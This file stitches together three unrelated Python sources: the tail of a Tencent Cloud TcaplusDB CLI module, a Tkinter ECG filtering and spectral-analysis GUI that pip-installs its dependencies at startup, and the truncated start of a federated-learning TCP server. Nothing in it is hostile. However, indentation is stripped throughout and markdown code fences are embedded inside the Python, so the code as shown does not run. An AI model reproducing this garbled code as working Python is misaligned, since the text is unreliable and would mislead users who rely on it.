"DeleteCluster": doDeleteCluster,
"ModifyClusterPassword": doModifyClusterPassword,
"DeleteIdlFiles": doDeleteIdlFiles,
"RecoverRecycleTables": doRecoverRecycleTables,
"CreateBackup": doCreateBackup,
"CreateTables": doCreateTables,
"ModifyTableQuotas": doModifyTableQuotas,
"DescribeClusters": doDescribeClusters,
"DeleteTableGroup": doDeleteTableGroup,
"ModifyTableGroupName": doModifyTableGroupName,
"CreateTableGroup": doCreateTableGroup,
"DescribeRegions": doDescribeRegions,
"DescribeTasks": doDescribeTasks,
"ModifyClusterTags": doModifyClusterTags,
"ModifyTableGroupTags": doModifyTableGroupTags,
"DescribeTableGroupTags": doDescribeTableGroupTags,
"DescribeTableGroups": doDescribeTableGroups,
"CompareIdlFiles": doCompareIdlFiles,
"DescribeIdlFileInfos": doDescribeIdlFileInfos,
"DeleteTables": doDeleteTables,
"ModifyTableMemos": doModifyTableMemos,
"VerifyIdlFiles": doVerifyIdlFiles,
"ClearTables": doClearTables,
"ModifyTables": doModifyTables,
"DescribeTables": doDescribeTables,
"DescribeClusterTags": doDescribeClusterTags,
}
AVAILABLE_VERSION_LIST = [
v20190823.version,
]
AVAILABLE_VERSIONS = {
'v' + v20190823.version.replace('-', ''): {"help": v20190823_help.INFO,"desc": v20190823_help.DESC},
}
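# The maps above are keyed by a normalized form of the API version string.
# A standalone, illustrative sketch of that normalization (the helper name
# below is invented for the example, not part of the generated CLI):

```python
def normalize_version(version):
    # "2019-08-23" -> "v20190823", matching the CLIENT_MAP / MODELS_MAP keys
    return "v" + version.replace("-", "")

print(normalize_version("2019-08-23"))  # v20190823
```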
def tcaplusdb_action(argv, arglist):
if "help" in argv:
versions = sorted(AVAILABLE_VERSIONS.keys())
opt_v = "--" + OptionsDefine.Version
version = versions[-1]
if opt_v in argv:
version = 'v' + argv[opt_v].replace('-', '')
if version not in versions:
print("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return
action_str = ""
docs = AVAILABLE_VERSIONS[version]["help"]
desc = AVAILABLE_VERSIONS[version]["desc"]
for action, info in docs.items():
action_str += " %s\n" % action
action_str += Utils.split_str(" ", info["desc"], 120)
helpstr = HelpTemplate.SERVICE % {"name": "tcaplusdb", "desc": desc, "actions": action_str}
print(helpstr)
else:
print(ErrorMsg.FEW_ARG)
def version_merge():
help_merge = {}
for v in AVAILABLE_VERSIONS:
for action in AVAILABLE_VERSIONS[v]["help"]:
if action not in help_merge:
help_merge[action] = {}
help_merge[action]["cb"] = ACTION_MAP[action]
help_merge[action]["params"] = []
for param in AVAILABLE_VERSIONS[v]["help"][action]["params"]:
if param["name"] not in help_merge[action]["params"]:
help_merge[action]["params"].append(param["name"])
return help_merge
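# version_merge() unions action metadata across API versions: one entry per
# action, holding its callback plus every parameter name seen in any version.
# A self-contained sketch with made-up version data (the callback and the
# version/action names here are placeholders):

```python
def merge_help(available_versions, action_map):
    merged = {}
    for version in available_versions.values():
        for action, info in version["help"].items():
            entry = merged.setdefault(action, {"cb": action_map[action], "params": []})
            for param in info["params"]:
                if param["name"] not in entry["params"]:
                    entry["params"].append(param["name"])
    return merged

dummy_cb = lambda argv, arglist: None
versions = {
    "v1": {"help": {"DescribeTables": {"params": [{"name": "ClusterId"}]}}},
    "v2": {"help": {"DescribeTables": {"params": [{"name": "ClusterId"}, {"name": "Limit"}]}}},
}
merged = merge_help(versions, {"DescribeTables": dummy_cb})
print(merged["DescribeTables"]["params"])  # ['ClusterId', 'Limit']
```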
def register_arg(command):
cmd = NiceCommand("tcaplusdb", tcaplusdb_action)
command.reg_cmd(cmd)
cmd.reg_opt("help", "bool")
cmd.reg_opt(OptionsDefine.Version, "string")
help_merge = version_merge()
for actionName, action in help_merge.items():
c = NiceCommand(actionName, action["cb"])
cmd.reg_cmd(c)
c.reg_opt("help", "bool")
for param in action["params"]:
c.reg_opt("--" + param, "string")
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
c.reg_opt(stropt, "string")
def parse_global_arg(argv):
params = {}
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
if stropt in argv:
params[opt] = argv[stropt]
else:
params[opt] = None
if params[OptionsDefine.Version]:
params[OptionsDefine.Version] = "v" + params[OptionsDefine.Version].replace('-', '')
config_handle = Configure()
profile = config_handle.profile
if ("--" + OptionsDefine.Profile) in argv:
profile = argv[("--" + OptionsDefine.Profile)]
is_conexist, conf_path = config_handle._profile_existed(profile + "." + config_handle.configure)
is_creexist, cred_path = config_handle._profile_existed(profile + "." + config_handle.credential)
config = {}
cred = {}
if is_conexist:
config = config_handle._load_json_msg(conf_path)
if is_creexist:
cred = config_handle._load_json_msg(cred_path)
if os.environ.get(OptionsDefine.ENV_SECRET_ID):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
if os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
if os.environ.get(OptionsDefine.ENV_REGION):
config[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in params.keys():
if param == OptionsDefine.Version:
continue
if params[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId]:
if param in cred:
params[param] = cred[param]
else:
raise Exception("%s is invalid" % param)
else:
if param in config:
params[param] = config[param]
elif param == OptionsDefine.Region:
raise Exception("%s is invalid" % OptionsDefine.Region)
try:
if params[OptionsDefine.Version] is None:
version = config["tcaplusdb"][OptionsDefine.Version]
params[OptionsDefine.Version] = "v" + version.replace('-', '')
if params[OptionsDefine.Endpoint] is None:
params[OptionsDefine.Endpoint] = config["tcaplusdb"][OptionsDefine.Endpoint]
except Exception as err:
raise Exception("config file:%s error, %s" % (conf_path, str(err)))
versions = sorted(AVAILABLE_VERSIONS.keys())
if params[OptionsDefine.Version] not in versions:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return params
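# parse_global_arg() resolves each credential with a fixed precedence: an
# explicit CLI value wins, then the environment variable, then the profile
# file on disk. A hypothetical standalone version of that lookup (function
# and variable names are illustrative, not part of the CLI):

```python
import os

def resolve_credential(cli_value, env_var, file_cred, key):
    # mirrors the precedence used by parse_global_arg
    if cli_value is not None:
        return cli_value
    if os.environ.get(env_var):
        return os.environ[env_var]
    if key in file_cred:
        return file_cred[key]
    raise Exception("%s is invalid" % key)
```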
def show_help(action, version):
docs = AVAILABLE_VERSIONS[version]["help"][action]
desc = AVAILABLE_VERSIONS[version]["desc"]
docstr = ""
for param in docs["params"]:
docstr += " %s\n" % ("--" + param["name"])
docstr += Utils.split_str(" ", param["desc"], 120)
helpmsg = HelpTemplate.ACTION % {"name": action, "service": "tcaplusdb", "desc": desc, "params": docstr}
print(helpmsg)
def get_actions_info():
config = Configure()
new_version = max(AVAILABLE_VERSIONS.keys())
version = new_version
try:
profile = config._load_json_msg(os.path.join(config.cli_path, "default.configure"))
version = profile["tcaplusdb"]["version"]
version = "v" + version.replace('-', '')
except Exception:
pass
if version not in AVAILABLE_VERSIONS.keys():
version = new_version
return AVAILABLE_VERSIONS[version]["help"]
# Source: GUI-ECG-Advanced-Filtering-and-Spectral-Analysis.py
# Repo: Philip-M-Schmidt/GUI-ECG-Advanced-Filtering (Apache-2.0)
# GUI of ECG Signal Generator with Spectral Analysis and Filtering
# Editor: Philip Schmidt
# Date: 24.01.2020
# Detailed script documentation in form of comments right next to the code
# Enjoy using the program!
# Installing and upgrading all necessary packages
from subprocess import call
my_packages = ['matplotlib', 'scipy', 'numpy==1.17.4']
def upgrade(package_list):
call(['pip', 'install', '--upgrade', '--user'] + package_list)
upgrade(my_packages)
# import of libraries
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
try:
    from scipy.misc import electrocardiogram  # SciPy < 1.10
except ImportError:
    from scipy.datasets import electrocardiogram  # scipy.misc was removed in newer SciPy
import numpy as np
import tkinter as tk
from tkinter import *
from tkinter import ttk
from tkinter import simpledialog  # required for the tk.simpledialog.ask* dialogs below
from math import pi
import scipy.fftpack as sf
import scipy.signal as sig
LARGE_FONT= ("Verdana", 12)
class window(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
tk.Tk.wm_title(self, "GUI ECG Signal with Advanced Filtering and Spectral_Analysis")
self._frame = None
self.switch_frame(StartPage)
def switch_frame(self, frame_class):
"""Destroys current frame and replaces it with a new one."""
new_frame = frame_class(self)
if self._frame is not None:
self._frame.destroy()
self._frame = new_frame
self._frame.pack()
class StartPage(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Welcome", font=("Verdana", 16))
label.pack(pady=10,padx=10)
self.pack(expand=True, fill='both')
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
label_1 = tk.Label(self, text="Sampling Rate / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack()
label_1_1 = tk.Label(self, text="360") # nice way of sorting widgets and grid to type in text :)
label_1_1.pack()
label_2 = tk.Label(self, text="Beats per Minutes / bpm")
label_2.pack()
label_2 = tk.Label(self, text="60")
label_2.pack()
label = tk.Label(self, text="This is the generated ECG! Analyze and filter your new ECG signal by clicking the buttons above!", font=LARGE_FONT)
label.pack(pady=10,padx=10)
self.ecg()
def ecg(self):
ecg = electrocardiogram()
fs = 360
time = np.arange(ecg.size) / fs
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(111)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(time, ecg)
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
class Analyzer(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Analyzer", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Back to Home", command=lambda: master.switch_frame(StartPage)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
label = tk.Label(self, text="The powerspectrum of the generated ECG signal is analyzed here!", font=LARGE_FONT)
label.pack(pady=10,padx=10)
self.spectral_analysis()
def spectral_analysis(self):
# Plotting ECG
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(211)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
#Spectral Analysis
x_fft = abs(sf.fft(x))
l = np.size(x)
        fr = (Fs / 2) * np.linspace(0, 1, l // 2)  # linspace expects an integer sample count
x_magnitude = (2 / l)* abs(x_fft[0:np.size(fr)])
f2 = Figure(figsize=(10,6), dpi=100)
        b = f2.add_subplot(111)  # attach to f2 so canvas2 is not left empty
        b.set_xlabel('Frequency / Hz')
        b.set_ylabel('Magnitude / dB')
        b.set_title("Spectral analysis of the ECG")
        b.plot(fr, 20 * np.log10(x_magnitude + 1e-12))  # small offset avoids log10(0)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar2 = NavigationToolbar2Tk(canvas2, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f.tight_layout()
f2.tight_layout()
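# The single-sided spectrum computed above can be sanity-checked on a known
# test tone. A standalone NumPy-only sketch of the same FFT and scaling
# steps (the 50 Hz tone is illustrative, not ECG data):

```python
import numpy as np

fs = 360                                   # same sampling rate as the ECG
t = np.arange(0, 1, 1 / fs)
x = np.sin(2 * np.pi * 50 * t)             # pure 50 Hz tone
l = x.size
fr = (fs / 2) * np.linspace(0, 1, l // 2)  # one-sided frequency axis
mag = (2 / l) * np.abs(np.fft.fft(x))[: l // 2]
print(round(fr[np.argmax(mag)]))           # 50
```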
class Filters(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Filters", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Back to Home", command=lambda: master.switch_frame(StartPage)).pack()
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="High Pass Filtering",
command=lambda: master.switch_frame(Highpass_Filter)).pack()
ttk.Button(self, text="Low Pass Filtering",
command=lambda: master.switch_frame(Lowpass_Filter)).pack()
ttk.Button(self, text="Band Pass Filtering",
command=lambda: master.switch_frame(Bandpass_Filter)).pack()
ttk.Button(self, text="Band Stop Filtering",
command=lambda: master.switch_frame(Bandstop_Filter)).pack()
label = tk.Label(self, text="This is the ECG we are going to filter! Please select your filter :)", font=LARGE_FONT)
label.pack(pady=10,padx=10)
self.ecg()
def ecg(self):
ecg = electrocardiogram()
fs = 360
time = np.arange(ecg.size) / fs
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(111)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(time, ecg)
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
class Bandpass_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Band Pass Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
Lower_CutoffFrequency = tk.simpledialog.askfloat("Lower CutoffFrequency", "Which lower Cut off Frequency do you want?")
Upper_CutoffFrequency = tk.simpledialog.askfloat("Upper CutoffFrequency", "Which upper Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Lower Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Lower_CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_1 = tk.Label(self, text="Upper Cut off Frequency / Hz")
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Upper_CutoffFrequency)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Bandpass_Filter(Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber)
def Bandpass_Filter(self, Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber):
matplotlib.pyplot.close('all')
# Design Band Pass Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([Lower_CutoffFrequency , Upper_CutoffFrequency]) # Cut off Frequency!!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'bandpass')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('Band Pass Filter Frequency Response')
        a.plot(W, 20 * np.log10(np.abs(h)))  # magnitude response in dB
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Bandpass filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
        a = f2.add_subplot(111)  # attach to f2 so canvas2 shows the filtered ECG
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.set_title('Band Pass Filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
        toolbar2 = NavigationToolbar2Tk(canvas2, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
        # unfiltered reference ECG (Fs, x and n are unchanged from above)
        f3 = Figure(figsize=(10, 6), dpi=100)
        a = f3.add_subplot(111)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
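# The Butterworth design above normalizes its cut-off frequencies by the
# Nyquist rate (Fs/2), i.e. `2 * cut_off_f / Fs`. A standalone check of that
# design with illustrative cut-offs (not tied to any particular ECG band):

```python
import numpy as np
import scipy.signal as sig

Fs = 360
cut_off = np.array([5.0, 40.0])                 # pass band in Hz (example values)
b, c = sig.butter(4, 2 * cut_off / Fs, btype="bandpass")
# evaluate the response at 10 Hz (inside) and 100 Hz (outside) the band
w = 2 * np.pi * np.array([10.0, 100.0]) / Fs    # rad/sample
_, h = sig.freqz(b, c, worN=w)
print(abs(h[0]) > 0.9, abs(h[1]) < 0.1)         # True True
```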
class Highpass_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="High Pass Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
CutoffFrequency = tk.simpledialog.askfloat("CutoffFrequency", "Which Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Highpass_Filter(CutoffFrequency, Ordernumber)
def Highpass_Filter(self, CutoffFrequency, Ordernumber):
# Design Highpass Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([ CutoffFrequency ]) # Cut off Frequency!!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'highpass')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('High Pass Filter Frequency Response')
        a.plot(W, 20 * np.log10(np.abs(h)))  # magnitude response in dB
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Highpass filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
        a = f2.add_subplot(111)  # attach to f2 so canvas2 shows the filtered ECG
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.set_title('High Pass Filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
        toolbar2 = NavigationToolbar2Tk(canvas2, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f3 = Figure(figsize=(10,6), dpi=100)
        a = f3.add_subplot(111)  # attach to f3 so the reference ECG canvas is not empty
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
class Lowpass_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Low Pass Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
CutoffFrequency = tk.simpledialog.askfloat("CutoffFrequency", "Which Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Lowpass_Filter(CutoffFrequency, Ordernumber)
def Lowpass_Filter(self, CutoffFrequency, Ordernumber):
# Design Lowpass Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([ CutoffFrequency ]) # Cut off Frequency!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'lowpass')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('Low Pass Filter Frequency Response')
        a.plot(W, 20 * np.log10(np.abs(h)))  # magnitude response in dB
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
        # Lowpass filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
        a = f2.add_subplot(111)  # attach to f2 so canvas2 shows the filtered ECG
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.set_title('Low Pass Filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
        toolbar2 = NavigationToolbar2Tk(canvas2, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f3 = Figure(figsize=(10,6), dpi=100)
        a = f3.add_subplot(111)  # attach to f3 so the reference ECG canvas is not empty
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
class Bandstop_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Band Stop Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
Lower_CutoffFrequency = tk.simpledialog.askfloat("Lower CutoffFrequency", "Which lower Cut off Frequency do you want?")
Upper_CutoffFrequency = tk.simpledialog.askfloat("Upper CutoffFrequency", "Which upper Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Lower Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Lower_CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_1 = tk.Label(self, text="Upper Cut off Frequency / Hz")
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Upper_CutoffFrequency)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Bandstop_Filter(Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber)
def Bandstop_Filter(self, Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber):
        # Design Bandstop Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([Lower_CutoffFrequency, Upper_CutoffFrequency]) # Cut off Frequency!!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'bandstop')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('Band Stop Filter Frequency Response')
        a.plot(W, 20 * np.log10(np.abs(h)))  # magnitude response in dB
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Bandstop filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
        a = f2.add_subplot(111)  # attach to f2 so canvas2 shows the filtered ECG
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
        a.set_title('Band Stop Filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
        toolbar2 = NavigationToolbar2Tk(canvas2, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f3 = Figure(figsize=(10,6), dpi=100)
        a = f3.add_subplot(111)  # attach to f3 so the reference ECG canvas is not empty
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
app = window()
app.mainloop()
# Source: socket_com/TCPSocket.py
# Repo: vineeths96/Federated-Learning (MIT)
import io
import time
import torch
import socket
import threading
from seed import set_seed
BUFFER = 1024 * 64
class TCPServer:
def __init__(
self,
SERVER=socket.gethostbyname(socket.gethostname()),
PORT=5050,
NUM_CLIENTS=1,
GRADIENT_SIZE=14728266,
DELAY=5e-3,
SEED=42,
):
